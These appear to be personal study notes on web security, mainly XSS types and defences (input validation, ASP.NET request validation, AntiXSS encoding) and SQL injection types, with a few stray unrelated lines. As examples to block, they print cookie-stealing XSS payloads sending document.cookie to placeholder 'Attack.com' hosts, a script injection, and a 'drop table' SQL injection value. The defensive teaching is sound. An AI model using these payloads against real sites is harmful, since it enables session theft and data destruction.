Security Development Lifecycle (SDL)

Get list of files in a directory with different file extentions

Number x number = number

CTS- Common Type System

CLS- Common Language Specification

CLR - Common Language Runtime

Cross-site scripting attacks = XSS

XSS vulnerabilities are currently known as three types
1 Reflected XSS Type-1 XSS a page reflects attacker-supplied data directly back to the victim.
2 stored XSS Type-2 XSS when a input system accepts hostile data, stores it in a file, database, or other back-end system
3 local XSS Type-0 Document Object Model-based XSS, attacks client side JavaScript code and variables.

Fix
Validate Input
Encode output
INPUT
Input can be from webpage or from somewhere else in the system.
Ex: Page text box inputs.
ex: Input data is in a file that is uploaded.

1) Donot allow these kind of inputs
FirstName <a href="javascript:document.location='http://plan1.Attack.com/'+document.cookie">DON</a>
FirstName <b onmouseover="document.location = 'http://plan2.Attack.com/' + document.cookie">DON</b>
www.Somesite.com?plan3=<script>MaliciousScript()</script>

2) Typically( at most..) allow only these tags but without attributes.(deny attributes)
<b>,<blockquote>,<br>,<div>,<em>,<i>,<li>,<ol>,<p>,<strong>,<u>,<ul>
Use RegularExpressionValidators

3) Page level validation Fix for asp.net pages
<%@ Page ValidateRequest="true">

Validation FIX across pages - in web.config
<configuration>
<system.web>
<pages validateRequest="true"/>
</system.web>
</configuration>


Encode output

Use HTMLEncode while display of any data.
Or
Use AntiXSS.HtmlEncode(Request.QueryString["name"])
Hello, <%= AntiXSS.HtmlEncode(Request.QueryString["name"]) %>
SQL injection
vulnerabilities are know in three different types
first order
a page constructs SQL statements based on the attacker-supplied data
Ex: user input for customerid
125 ; drop table customers instead of 125

So SQL turns out to be
select * from customers where custid=125 ; drop table customers
insted of
select * from customers where custid=125

second order
attacker submits hostile data through a Web page that stores it in a file, database, or other data store.
Nothing happens immediately.
but expect an unexpected SQL to get executed in a SQLJob / or any fortnightly job which gets excuted on the data.

truncation vulnerabilities
attacker uses varying buffer lengths to truncate a delimited string and uses another input value to inject his commands of choice into a dynamically constructed SQL statement.